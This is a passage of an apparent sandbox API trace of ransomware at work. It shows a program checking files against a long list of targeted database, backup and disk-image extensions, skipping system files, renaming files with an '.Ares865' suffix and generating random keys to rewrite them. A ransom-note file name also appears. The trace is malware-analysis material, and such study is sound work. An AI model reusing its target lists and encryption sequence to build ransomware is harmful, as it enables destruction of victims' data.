lpString2="rsd") returned -1 [0063.416] lstrlenW (lpString="sas7bdat") returned 8 [0063.416] lstrcmpiW (lpString1="rden.htm", lpString2="sas7bdat") returned -1 [0063.416] lstrlenW (lpString="sbf") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="sbf") returned -1 [0063.416] lstrlenW (lpString="scx") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="scx") returned -1 [0063.416] lstrlenW (lpString="sdb") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="sdb") returned -1 [0063.416] lstrlenW (lpString="sdc") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="sdc") returned -1 [0063.416] lstrlenW (lpString="sdf") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="sdf") returned -1 [0063.416] lstrlenW (lpString="sis") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="sis") returned -1 [0063.416] lstrlenW (lpString="spq") returned 3 [0063.416] lstrcmpiW (lpString1="htm", lpString2="spq") returned -1 [0063.417] lstrlenW (lpString="te") returned 2 [0063.417] lstrcmpiW (lpString1="tm", lpString2="te") returned 1 [0063.417] lstrlenW (lpString="teacher") returned 7 [0063.417] lstrcmpiW (lpString1="den.htm", lpString2="teacher") returned -1 [0063.417] lstrlenW (lpString="tmd") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="tmd") returned -1 [0063.417] lstrlenW (lpString="tps") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="tps") returned -1 [0063.417] lstrlenW (lpString="trc") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.417] lstrlenW (lpString="trc") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.417] lstrlenW (lpString="trm") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="trm") returned -1 [0063.417] lstrlenW (lpString="udb") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="udb") returned -1 [0063.417] lstrlenW (lpString="udl") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="udl") returned -1 [0063.417] lstrlenW (lpString="usr") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="usr") returned -1 [0063.417] lstrlenW (lpString="v12") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="v12") returned -1 [0063.417] lstrlenW (lpString="vis") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="vis") returned -1 [0063.417] lstrlenW (lpString="vpd") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="vpd") returned -1 [0063.417] lstrlenW (lpString="vvv") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="vvv") returned -1 [0063.417] lstrlenW (lpString="wdb") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="wdb") returned -1 [0063.417] lstrlenW (lpString="wmdb") returned 4 [0063.417] lstrcmpiW (lpString1=".htm", lpString2="wmdb") returned -1 [0063.417] lstrlenW (lpString="wrk") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="wrk") returned -1 [0063.417] lstrlenW (lpString="xdb") returned 3 [0063.417] lstrcmpiW (lpString1="htm", lpString2="xdb") returned -1 [0063.417] lstrlenW (lpString="xld") returned 3 [0063.418] lstrcmpiW (lpString1="htm", lpString2="xld") returned -1 [0063.418] lstrlenW (lpString="xmlff") returned 5 [0063.418] lstrcmpiW (lpString1="n.htm", lpString2="xmlff") returned -1 [0063.418] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.Ares865") returned 89 [0063.418] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\garden.htm"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\garden.htm.ares865"), dwFlags=0x1) returned 1 [0063.420] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.htm.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\garden.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.421] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=231) returned 1 [0063.421] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.421] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.421] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.421] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.422] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.422] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.422] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3f0, lpName=0x0) returned 0x164 [0063.424] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f0) returned 0x190000 [0063.424] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0063.425] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0063.425] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0063.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0063.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0063.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0063.425] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0063.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0063.425] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0063.426] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0063.426] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0063.426] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0063.426] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0063.426] CloseHandle (hObject=0x164) returned 1 [0063.426] CloseHandle (hObject=0x154) returned 1 [0063.426] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0063.426] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0063.426] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0063.426] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaa410937, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Garden.jpg", cAlternateFileName="")) returned 1 [0063.426] lstrcmpiW (lpString1="Garden.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.426] lstrcmpiW (lpString1="Garden.jpg", lpString2="aoldtz.exe") returned 1 [0063.426] lstrcmpiW (lpString1="Garden.jpg", lpString2=".") returned 1 [0063.426] lstrcmpiW (lpString1="Garden.jpg", lpString2="..") returned 1 [0063.426] lstrcmpiW (lpString1="Garden.jpg", lpString2="windows") returned -1 [0063.426] lstrcmpiW (lpString1="Garden.jpg", lpString2="bootmgr") returned 1 [0063.426] lstrcmpiW (lpString1="Garden.jpg", lpString2="temp") returned -1 [0063.426] lstrcmpiW (lpString1="Garden.jpg", lpString2="pagefile.sys") returned -1 [0063.426] lstrcmpiW (lpString1="Garden.jpg", lpString2="boot") returned 1 [0063.427] lstrcmpiW (lpString1="Garden.jpg", lpString2="ids.txt") returned -1 [0063.427] lstrcmpiW (lpString1="Garden.jpg", lpString2="ntuser.dat") returned -1 [0063.427] lstrcmpiW (lpString1="Garden.jpg", lpString2="perflogs") returned -1 [0063.427] lstrcmpiW (lpString1="Garden.jpg", lpString2="MSBuild") returned -1 [0063.427] lstrlenW (lpString="Garden.jpg") returned 10 [0063.427] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 81 [0063.427] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Garden.jpg" | out: lpString1="Garden.jpg") returned="Garden.jpg" [0063.427] lstrlenW (lpString="Garden.jpg") returned 10 [0063.427] lstrlenW (lpString="Ares865") returned 7 [0063.427] lstrcmpiW (lpString1="den.jpg", lpString2="Ares865") returned 1 [0063.427] lstrlenW (lpString=".dll") returned 4 [0063.427] lstrcmpiW (lpString1="Garden.jpg", lpString2=".dll") returned 1 [0063.427] lstrlenW (lpString=".lnk") returned 4 [0063.427] lstrcmpiW (lpString1="Garden.jpg", lpString2=".lnk") returned 1 [0063.427] lstrlenW (lpString=".ini") returned 4 [0063.427] lstrcmpiW (lpString1="Garden.jpg", lpString2=".ini") returned 1 [0063.427] lstrlenW (lpString=".sys") returned 4 [0063.427] lstrcmpiW (lpString1="Garden.jpg", lpString2=".sys") returned 1 [0063.427] lstrlenW (lpString="Garden.jpg") returned 10 [0063.427] lstrlenW (lpString="bak") returned 3 [0063.427] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0063.427] lstrlenW (lpString="ba_") returned 3 [0063.427] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0063.427] lstrlenW (lpString="dbb") returned 3 [0063.427] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0063.427] lstrlenW (lpString="vmdk") returned 4 [0063.427] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0063.427] lstrlenW (lpString="rar") returned 3 [0063.427] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0063.427] lstrlenW (lpString="zip") returned 3 [0063.427] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0063.427] lstrlenW (lpString="tgz") returned 3 [0063.427] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0063.427] lstrlenW (lpString="vbox") returned 4 [0063.427] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0063.427] lstrlenW (lpString="vdi") returned 3 [0063.428] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0063.428] lstrlenW (lpString="vhd") returned 3 [0063.428] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0063.428] lstrlenW (lpString="vhdx") returned 4 [0063.428] lstrcmpiW (lpString1=".jpg", lpString2="vhdx") returned -1 [0063.428] lstrlenW (lpString="avhd") returned 4 [0063.428] lstrcmpiW (lpString1=".jpg", lpString2="avhd") returned -1 [0063.428] lstrlenW (lpString="db") returned 2 [0063.428] lstrcmpiW (lpString1="pg", lpString2="db") returned 1 [0063.428] lstrlenW (lpString="db2") returned 3 [0063.428] lstrcmpiW (lpString1="jpg", lpString2="db2") returned 1 [0063.428] lstrlenW (lpString="db3") returned 3 [0063.428] lstrcmpiW (lpString1="jpg", lpString2="db3") returned 1 [0063.428] lstrlenW (lpString="dbf") returned 3 [0063.428] lstrcmpiW (lpString1="jpg", lpString2="dbf") returned 1 [0063.428] lstrlenW (lpString="mdf") returned 3 [0063.428] lstrcmpiW (lpString1="jpg", lpString2="mdf") returned -1 [0063.428] lstrlenW (lpString="mdb") returned 3 [0063.428] lstrcmpiW (lpString1="jpg", lpString2="mdb") returned -1 [0063.428] lstrlenW (lpString="sql") returned 3 [0063.428] lstrcmpiW (lpString1="jpg", lpString2="sql") returned -1 [0063.428] lstrlenW (lpString="sqlite") returned 6 [0063.428] lstrcmpiW (lpString1="en.jpg", lpString2="sqlite") returned -1 [0063.428] lstrlenW (lpString="sqlite3") returned 7 [0063.428] lstrcmpiW (lpString1="den.jpg", lpString2="sqlite3") returned -1 [0063.428] lstrlenW (lpString="sqlitedb") returned 8 [0063.428] lstrcmpiW (lpString1="rden.jpg", lpString2="sqlitedb") returned -1 [0063.428] lstrlenW (lpString="xml") returned 3 [0063.428] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0063.428] lstrlenW (lpString="$er") returned 3 [0063.428] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0063.428] lstrlenW (lpString="4dd") returned 3 [0063.428] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0063.428] lstrlenW (lpString="4dl") returned 3 [0063.428] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0063.428] lstrlenW (lpString="^^^") returned 3 [0063.428] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0063.429] lstrlenW (lpString="abs") returned 3 [0063.429] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0063.429] lstrlenW (lpString="abx") returned 3 [0063.429] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0063.429] lstrlenW (lpString="accdb") returned 5 [0063.429] lstrcmpiW (lpString1="n.jpg", lpString2="accdb") returned 1 [0063.429] lstrlenW (lpString="accdc") returned 5 [0063.429] lstrcmpiW (lpString1="n.jpg", lpString2="accdc") returned 1 [0063.429] lstrlenW (lpString="accde") returned 5 [0063.429] lstrcmpiW (lpString1="n.jpg", lpString2="accde") returned 1 [0063.429] lstrlenW (lpString="accdr") returned 5 [0063.429] lstrcmpiW (lpString1="n.jpg", lpString2="accdr") returned 1 [0063.429] lstrlenW (lpString="accdt") returned 5 [0063.429] lstrcmpiW (lpString1="n.jpg", lpString2="accdt") returned 1 [0063.429] lstrlenW (lpString="accdw") returned 5 [0063.429] lstrcmpiW (lpString1="n.jpg", lpString2="accdw") returned 1 [0063.429] lstrlenW (lpString="accft") returned 5 [0063.429] lstrcmpiW (lpString1="n.jpg", lpString2="accft") returned 1 [0063.429] lstrlenW (lpString="adb") returned 3 [0063.429] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.429] lstrlenW (lpString="adb") returned 3 [0063.429] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0063.429] lstrlenW (lpString="ade") returned 3 [0063.429] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0063.429] lstrlenW (lpString="adf") returned 3 [0063.429] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0063.429] lstrlenW (lpString="adn") returned 3 [0063.429] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0063.429] lstrlenW (lpString="adp") returned 3 [0063.429] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0063.429] lstrlenW (lpString="alf") returned 3 [0063.429] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0063.429] lstrlenW (lpString="ask") returned 3 [0063.429] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0063.429] lstrlenW (lpString="btr") returned 3 [0063.429] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0063.429] lstrlenW (lpString="cat") returned 3 [0063.430] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0063.430] lstrlenW (lpString="cdb") returned 3 [0063.430] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0063.430] lstrlenW (lpString="ckp") returned 3 [0063.430] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0063.430] lstrlenW (lpString="cma") returned 3 [0063.430] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0063.430] lstrlenW (lpString="cpd") returned 3 [0063.430] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0063.430] lstrlenW (lpString="dacpac") returned 6 [0063.430] lstrcmpiW (lpString1="en.jpg", lpString2="dacpac") returned 1 [0063.430] lstrlenW (lpString="dad") returned 3 [0063.430] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0063.430] lstrlenW (lpString="dadiagrams") returned 10 [0063.430] lstrlenW (lpString="daschema") returned 8 [0063.430] lstrcmpiW (lpString1="rden.jpg", lpString2="daschema") returned 1 [0063.430] lstrlenW (lpString="db-journal") returned 10 [0063.430] lstrlenW (lpString="db-shm") returned 6 [0063.430] lstrcmpiW (lpString1="en.jpg", lpString2="db-shm") returned 1 [0063.430] lstrlenW (lpString="db-wal") returned 6 [0063.430] lstrcmpiW (lpString1="en.jpg", lpString2="db-wal") returned 1 [0063.430] lstrlenW (lpString="dbc") returned 3 [0063.430] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0063.430] lstrlenW (lpString="dbs") returned 3 [0063.430] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0063.430] lstrlenW (lpString="dbt") returned 3 [0063.430] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0063.430] lstrlenW (lpString="dbv") returned 3 [0063.430] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0063.430] lstrlenW (lpString="dbx") returned 3 [0063.430] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0063.430] lstrlenW (lpString="dcb") returned 3 [0063.430] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0063.430] lstrlenW (lpString="dct") returned 3 [0063.430] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0063.430] lstrlenW (lpString="dcx") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0063.431] lstrlenW (lpString="ddl") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0063.431] lstrlenW (lpString="dlis") returned 4 [0063.431] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0063.431] lstrlenW (lpString="dp1") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0063.431] lstrlenW (lpString="dqy") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0063.431] lstrlenW (lpString="dsk") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0063.431] lstrlenW (lpString="dsn") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0063.431] lstrlenW (lpString="dtsx") returned 4 [0063.431] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0063.431] lstrlenW (lpString="dxl") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0063.431] lstrlenW (lpString="eco") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0063.431] lstrlenW (lpString="ecx") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0063.431] lstrlenW (lpString="edb") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0063.431] lstrlenW (lpString="epim") returned 4 [0063.431] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0063.431] lstrlenW (lpString="fcd") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0063.431] lstrlenW (lpString="fdb") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0063.431] lstrlenW (lpString="fic") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0063.431] lstrlenW (lpString="flexolibrary") returned 12 [0063.431] lstrlenW (lpString="fm5") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0063.431] lstrlenW (lpString="fmp") returned 3 [0063.431] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0063.432] lstrlenW (lpString="fmp12") returned 5 [0063.432] lstrcmpiW (lpString1="n.jpg", lpString2="fmp12") returned 1 [0063.432] lstrlenW (lpString="fmpsl") returned 5 [0063.432] lstrcmpiW (lpString1="n.jpg", lpString2="fmpsl") returned 1 [0063.432] lstrlenW (lpString="fol") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0063.432] lstrlenW (lpString="fp3") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0063.432] lstrlenW (lpString="fp4") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0063.432] lstrlenW (lpString="fp5") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0063.432] lstrlenW (lpString="fp7") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0063.432] lstrlenW (lpString="fpt") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0063.432] lstrlenW (lpString="frm") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0063.432] lstrlenW (lpString="gdb") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.432] lstrlenW (lpString="gdb") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0063.432] lstrlenW (lpString="grdb") returned 4 [0063.432] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0063.432] lstrlenW (lpString="gwi") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0063.432] lstrlenW (lpString="hdb") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0063.432] lstrlenW (lpString="his") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0063.432] lstrlenW (lpString="ib") returned 2 [0063.432] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0063.432] lstrlenW (lpString="idb") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0063.432] lstrlenW (lpString="ihx") returned 3 [0063.432] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0063.432] lstrlenW (lpString="itdb") returned 4 [0063.433] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0063.433] lstrlenW (lpString="itw") returned 3 [0063.433] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0063.433] lstrlenW (lpString="jet") returned 3 [0063.433] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0063.433] lstrlenW (lpString="jtx") returned 3 [0063.433] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0063.433] lstrlenW (lpString="kdb") returned 3 [0063.433] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0063.433] lstrlenW (lpString="kexi") returned 4 [0063.433] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0063.433] lstrlenW (lpString="kexic") returned 5 [0063.433] lstrcmpiW (lpString1="n.jpg", lpString2="kexic") returned 1 [0063.433] lstrlenW (lpString="kexis") returned 5 [0063.433] lstrcmpiW (lpString1="n.jpg", lpString2="kexis") returned 1 [0063.433] lstrlenW (lpString="lgc") returned 3 [0063.433] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0063.433] lstrlenW (lpString="lwx") returned 3 [0063.433] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0063.433] lstrlenW (lpString="maf") returned 3 [0063.433] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0063.433] lstrlenW (lpString="maq") returned 3 [0063.433] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0063.433] lstrlenW (lpString="mar") returned 3 [0063.433] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0063.433] lstrlenW (lpString="marshal") returned 7 [0063.433] lstrcmpiW (lpString1="den.jpg", lpString2="marshal") returned -1 [0063.433] lstrlenW (lpString="mas") returned 3 [0063.433] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0063.433] lstrlenW (lpString="mav") returned 3 [0063.433] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0063.433] lstrlenW (lpString="maw") returned 3 [0063.433] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0063.433] lstrlenW (lpString="mdbhtml") returned 7 [0063.433] lstrcmpiW (lpString1="den.jpg", lpString2="mdbhtml") returned -1 [0063.433] lstrlenW (lpString="mdn") returned 3 [0063.433] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0063.434] lstrlenW (lpString="mdt") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0063.434] lstrlenW (lpString="mfd") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0063.434] lstrlenW (lpString="mpd") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0063.434] lstrlenW (lpString="mrg") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0063.434] lstrlenW (lpString="mud") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0063.434] lstrlenW (lpString="mwb") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0063.434] lstrlenW (lpString="myd") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0063.434] lstrlenW (lpString="ndf") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0063.434] lstrlenW (lpString="nnt") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0063.434] lstrlenW (lpString="nrmlib") returned 6 [0063.434] lstrcmpiW (lpString1="en.jpg", lpString2="nrmlib") returned -1 [0063.434] lstrlenW (lpString="ns2") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0063.434] lstrlenW (lpString="ns3") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0063.434] lstrlenW (lpString="ns4") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0063.434] lstrlenW (lpString="nsf") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0063.434] lstrlenW (lpString="nv") returned 2 [0063.434] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0063.434] lstrlenW (lpString="nv2") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0063.434] lstrlenW (lpString="nwdb") returned 4 [0063.434] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0063.434] lstrlenW (lpString="nyf") returned 3 [0063.434] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0063.434] lstrlenW (lpString="odb") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.435] lstrlenW (lpString="odb") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0063.435] lstrlenW (lpString="oqy") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0063.435] lstrlenW (lpString="ora") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0063.435] lstrlenW (lpString="orx") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0063.435] lstrlenW (lpString="owc") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0063.435] lstrlenW (lpString="p96") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0063.435] lstrlenW (lpString="p97") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0063.435] lstrlenW (lpString="pan") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0063.435] lstrlenW (lpString="pdb") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0063.435] lstrlenW (lpString="pdm") returned 3 [0063.435] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 